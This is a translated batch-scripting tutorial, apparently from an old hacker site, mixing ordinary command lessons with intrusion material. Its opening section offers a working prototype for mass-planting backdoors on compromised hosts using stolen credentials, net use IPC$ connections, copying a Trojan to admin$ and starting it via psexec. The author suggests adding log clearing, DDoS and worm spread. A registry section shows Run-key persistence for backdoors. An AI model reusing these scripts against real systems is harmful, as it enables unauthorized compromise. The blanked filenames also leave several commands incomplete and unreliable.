sample3:
Have you ever had a pile of compromised hosts ("broilers") waiting for you to plant a backdoor and Trojan on each of them? When there are many, what started out as a happy job becomes very tedious :). This article begins with using batch files to simplify daily or repetitive tasks. So how is it done? Haha, you will understand after reading it.
There is only one main command (when using the FOR command inside a batch file, the loop variable is written as %%variable):
@for /f "tokens=1,2,3 delims= " %%i in () do start call %%i %%j %%k
See sample1 above for the usage of tokens; here it means that the three fields of each line are passed, in order, to the parameters %%i %%j %%k.
It is nothing more than using the net use command to establish an IPC$ connection, copying the Trojan and backdoor to the victim, and then using the return code (if errorlevel =) to filter out the hosts on which the backdoor was planted successfully, echoing them to the screen or to a specified file.
delims= means the fields are separated by a space. I think you can already picture what the content of that file looks like: it is arranged according to the objects represented by %%i %%j %%k, generally ip password username.
Code prototype:
--------------- cut here then save as a batchfile(I call it ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in () do start call %%i %%j %%k
@goto end
:usage
@echo run this batch in dos just double-click it.
:end
--------------- cut here then save as a batchfile(I call it ) ---------------------------
------------------- cut here then save as a batchfile(I call it ) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>
@psexec \\%1 c:\winnt\system32\
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>
:failed
@echo Sorry, cannot connect to the victim
----------------- cut here then save as a batchfile(I call it ) --------------------------------
This is just a prototype of automated backdoor planting with batch files. The two batch files and the backdoor program () need to be placed in the same directory. The batch content can also be extended, for example by adding log clearing + DDOS, adding users at fixed intervals, or going deeper and giving it an automatic propagation function (a worm). I will not describe that here; friends who are interested can study it themselves.
2. How to use parameters in batch files
Parameters can be used in batch files, generally %1 to %9. When there are more parameters than that, you need to use shift to move through them. This is rare, so we do not consider it here.
sample1:
@echo off
rem pass "a" as the first parameter to start formatting
if "%1"=="a" format a:
:format
rem /q quick format, /u unconditional; /autotest is assumed to be the undocumented
rem switch that skips the prompts (the original read "/auotset", a typo)
@format a:/q/u/autotest
@echo please insert another disk into drive A.
@pause
rem the label above is :format, so the jump must be "goto format" (the original had "goto fomat")
@goto format
This example formats several floppy disks one after another, so when using it you need to enter a (the parameter) in the DOS window. Haha, it seems a bit superfluous~^_^
sample2:
When we want to establish an IPC$ connection we always have to type a long command, and one slip means typing it wrong. So we might as well write the fixed commands into a batch file and hand it the broiler's ip, password and username as parameters, in the same way as above, so we do not need to type the commands every time.
@echo off
rem %1 is the ip, %2 is the PASSWORD (note: the password is the second parameter), %3 is the username
@net use \\%1\ipc$ "%2" /u:"%3"
@if errorlevel 1 echo connection failed
How about that, using parameters is quite simple, isn't it? You are so handsome, you must have learned it ^_^.
3. How to use Compound Command
1. &
Usage: First Command & Second Command [& Third Command...]
This runs the commands one after another, regardless of whether each command succeeds.
Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51 <DIR> .
2002-05-14 23:51 <DIR> ..
2002-05-14 23:51 14
2.&&
Usage: First Command && Second Command [&& Third Command...]
This runs the commands one after another, but as soon as a command fails the remaining commands are not executed; if no error occurs, all of them are executed.
Sample:
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.
C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:55 <DIR> .
2002-05-14 23:55 <DIR> ..
2002-05-14 23:55 14
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
This kind of command can be used when making backups, for example:
dir \\192.168.0.1\database\ && copy \\192.168.0.1\database\ E:\backup
If the file exists on the remote server, the copy command is executed; if the file does not exist, the copy command is skipped. This usage can replace IF EXIST :)
3.||
Usage: First Command || Second Command [|| Third Command...]
This runs the commands one after another, but as soon as a command succeeds the remaining commands are not executed; if none of them succeeds, all of them are executed in turn.
Sample:
C:\Ex4rch>dir || del
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
Examples of using combination commands:
sample:
@copy \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>
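The backup case from the && section, written out as an added batch example (mine, not the article's own code): && runs the copy only when dir could find the source, || reports when either step fails, and & appends a log line unconditionally. The server, share, file and destination names are assumptions.

```batch
@echo off
rem Added example (not from the original article): a conditional backup built from
rem && and || instead of IF EXIST. Server, share, file and destination are assumptions.
setlocal
set SRC=\\192.168.0.1\database\backup.mdb
set DST=E:\backup

rem mkdir fails harmlessly when the folder already exists; 2>nul hides that message.
mkdir "%DST%" 2>nul

rem dir sets errorlevel 1 when the path cannot be found. Its listing is discarded with
rem >nul 2>&1, so only our own messages are printed. The block after && runs only if
rem dir succeeded; the echo after the final || runs only if dir failed.
dir "%SRC%" >nul 2>&1 && (
    echo Source found, copying...
    copy "%SRC%" "%DST%" >nul && echo Backup written to %DST% || echo Copy FAILED
) || echo Source %SRC% not reachable, nothing copied

rem & chains unconditionally: the log line is written whether or not the copy worked.
echo %date% %time% backup run finished>>"%DST%\backup.log" & echo Done.
endlocal
```

The inner `copy ... && echo ... || echo ...` shows why || is handy inside a && block: the block's result is that of its last command, so the outer || only reacts to the dir failing, while the inner || reacts to the copy itself.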
4. Use of pipeline commands
1. | (pipe) command
Usage: First Command | Second Command [| Third Command...]
The output of the first command is fed to the second command as its input. Remember that this method is very common on Unix.
sample:
time /t>>D:\
netstat -n -p tcp|find ":3389">>D:\
start Explorer
Did you see it? Terminal Services lets us set a starting program for a user, so if the user runs the above bat on login we obtain the IP of whoever logged in.
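As an added example (not code from the original article) that ties the FOR /F tokens/delims syntax from the start of the page to the pipe and redirection commands of this section: the batch below runs netstat through find, splits each matching line into fields with FOR /F, and appends the remote address of every established RDP session to a log file. The log path and the assumption that netstat prints IPv4 addresses are mine.

```batch
@echo off
rem Added example (not from the original article): log the remote address of every
rem established RDP (port 3389) connection, one line per session, with a timestamp.
rem Assumes cmd.exe with netstat and find available and IPv4 addresses; the log path
rem is an assumption.
setlocal
set LOGFILE=%SystemDrive%\rdp_logins.log

rem netstat -n -p tcp prints lines such as (constructed sample):
rem   TCP    10.0.0.5:3389      10.0.0.77:1052     ESTABLISHED
rem Default delims are space and tab, so tokens 1..4 are Proto, Local, Foreign, State.
rem The ^| escapes the pipe inside the FOR /F command string.
for /f "tokens=1,2,3,4" %%a in ('netstat -n -p tcp ^| find ":3389"') do (
    if "%%d"=="ESTABLISHED" (
        rem Split the foreign address into IP and port on the colon.
        for /f "tokens=1,2 delims=:" %%x in ("%%c") do (
            echo %date% %time% RDP session from %%x port %%y to %%b>>"%LOGFILE%"
        )
    )
)
endlocal
```

Run it as the user's startup program, or from a scheduled task, and the log grows by one line per session; because `find` exits with 1 when nothing matches, the loop simply runs zero times on an idle machine.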
2. >, >> output redirection commands
These redirect the output of a command or program into a specified file. The difference between > and >> is that > clears the existing content of the file before writing, while >> only appends to the file without changing what is already there.
sample1:
echo hello world>c:\ (stupid example?)
sample2:
DLL Trojans are popular nowadays. We know that system32 is a good place to play hide-and-seek; many Trojans squeeze their way in there, and DLL Trojans are no exception. Against this, we can record the EXE and DLL files in that directory right after installing the system and the necessary applications:
Run CMD, change directory to system32, then: dir *.exe> & dir *.dll>,
This way the names of all EXE and DLL files are recorded in and respectively.
If later you find something abnormal but cannot locate the problem with traditional methods, consider whether a DLL Trojan has sneaked into the system.
At that point, use the same command to record the EXE and DLL files under system32 into another and , then run:
CMD: fc > & fc >. (Use the FC command to compare the DLL and EXE lists from before and after, and write the results into .) This way we can find the extra DLL and EXE files; by checking their creation time, version, whether they are packed and so on, it becomes easier to decide whether a DLL Trojan has paid a visit. Best if there is none. If there is one, don't just DEL it: first use regsvr32 /u to unregister the backdoor DLL, then move it to the Recycle Bin. If the system shows no abnormal reaction, delete it for good or submit it to an antivirus company.
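The baseline-and-compare procedure just described, written out as an added batch script (my example, not the article's): `baseline` records the EXE and DLL names under system32, `check` records them again, compares the lists with FC and then prints every name that is present now but was not in the baseline. The snapshot folder and file names are assumptions, since the article leaves its own file names blank.

```batch
@echo off
rem Added example (not from the original article): record the EXE and DLL names in
rem system32 and compare them with an earlier record. Snapshot folder and file names
rem are assumptions.
setlocal
set BASEDIR=%SystemRoot%\system32
set SNAPDIR=%SystemDrive%\snap
if not exist "%SNAPDIR%" mkdir "%SNAPDIR%"

if "%1"=="baseline" goto baseline
if "%1"=="check" goto check
echo usage: %~nx0 baseline ^| check
goto :eof

:baseline
rem dir /b prints bare names, /a-d leaves out directories; sort gives a stable order.
dir /b /a-d "%BASEDIR%\*.exe" | sort > "%SNAPDIR%\exe_base.txt"
dir /b /a-d "%BASEDIR%\*.dll" | sort > "%SNAPDIR%\dll_base.txt"
echo Baseline written to %SNAPDIR%
goto :eof

:check
dir /b /a-d "%BASEDIR%\*.exe" | sort > "%SNAPDIR%\exe_now.txt"
dir /b /a-d "%BASEDIR%\*.dll" | sort > "%SNAPDIR%\dll_now.txt"
rem fc /l compares as text and sets errorlevel 1 when the two lists differ.
fc /l "%SNAPDIR%\exe_base.txt" "%SNAPDIR%\exe_now.txt" > "%SNAPDIR%\exe_diff.txt"
if errorlevel 1 echo EXE list changed, details in %SNAPDIR%\exe_diff.txt
fc /l "%SNAPDIR%\dll_base.txt" "%SNAPDIR%\dll_now.txt" > "%SNAPDIR%\dll_diff.txt"
if errorlevel 1 echo DLL list changed, details in %SNAPDIR%\dll_diff.txt
rem Names present now but absent from the baseline are the ones to inspect
rem (creation time, version information, packing). findstr /x /i /c: looks for the
rem whole line, case-insensitively; the || branch fires when it is not found.
for %%t in (exe dll) do (
    for /f "usebackq delims=" %%f in ("%SNAPDIR%\%%t_now.txt") do (
        findstr /x /i /c:"%%f" "%SNAPDIR%\%%t_base.txt" >nul || echo NEW %%t: %%f
    )
)
goto :eof
```

Take the baseline right after installation and after every legitimate update, otherwise `check` will report patched system files alongside anything suspicious; the FC diff files keep the removed names too, which the NEW loop deliberately ignores.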
3. <, >&, <&
< Read command input from a file instead of from the keyboard.
>& Writes the output of one handle to the input of another handle.
<& Read input from one handle and write it to the output of another handle.
These are not commonly used, so I won't introduce them much.
5. How to use batch files to operate the registry
During an intrusion, specific keys and values in the registry often have to be changed to achieve some purpose, for example hiding the backdoor and Trojan program, deleting leftover values under Run, or creating a service to load the backdoor. Of course we also modify the registry to harden the system or to change a certain attribute of the system. All of this requires some understanding of registry operations. Let's first learn how to use .REG files to operate on the registry. (We can use batch files to generate a REG file.)
Regarding registry operations, the common ones are creation, modification and deletion.
1. Create
There are two kinds of creation. One is to create a subkey.
We create a file with the following content:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
Then execute the script and you have created a subkey named "hacker" under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft.
The other is to create a value name.
This file format is the typical .REG format, the same as a file exported from the registry, and the content is as follows:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"="C:\\WINNT\\system32\\"
"Autodos"=dword:00000002
This creates three new values under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]: Invader, Door and Autodos.
The type of Invader is "String Value"
The type of Door is "REG_SZ Value"
The type of Autodos is "DWORD Value"
2. Modify
Modification is relatively simple: export the item you need to modify, edit it with Notepad, then import it again (regedit /s).
3. Delete
Let’s first talk about deleting a project name. We create a file like this:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
When the script is executed, the value "Ex4rch" under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] is deleted;
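The "generate a REG file from batch" idea mentioned at the start of this section, as an added example that is not the article's own code: the script first exports the Run key with regedit /e so the change can be undone, then writes a .REG file that deletes one value (the "name"=- syntax shown above) and imports it silently with regedit /s. The value name comes from the first parameter; the temporary file names are assumptions.

```batch
@echo off
rem Added example (not from the original article): back up the Run key, generate a
rem .reg file from batch that removes one named value, and import it silently.
rem The value name to remove is passed as %1; the file names below are assumptions.
setlocal
set RUNKEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
set BACKUP=%TEMP%\run_backup.reg
set REGFILE=%TEMP%\remove_value.reg

if "%1"=="" (
    echo usage: %~nx0 ValueName
    goto :eof
)

rem 1. Export the key first; the change can be reverted later with: regedit /s "%BACKUP%"
regedit /e "%BACKUP%" "%RUNKEY%"

rem 2. Write the .reg file: header line, a blank line, the key, and "name"=- to delete.
echo Windows Registry Editor Version 5.00> "%REGFILE%"
echo.>> "%REGFILE%"
echo [%RUNKEY%]>> "%REGFILE%"
echo "%~1"=->> "%REGFILE%"

rem 3. Import without the confirmation dialog.
regedit /s "%REGFILE%"
echo Removed value "%~1" from %RUNKEY% (backup in %BACKUP%)
endlocal
```

The blank line after the header is not decoration: regedit expects it, which is why the `echo.` line is there. Keep the exported backup until you have confirmed the machine still starts cleanly.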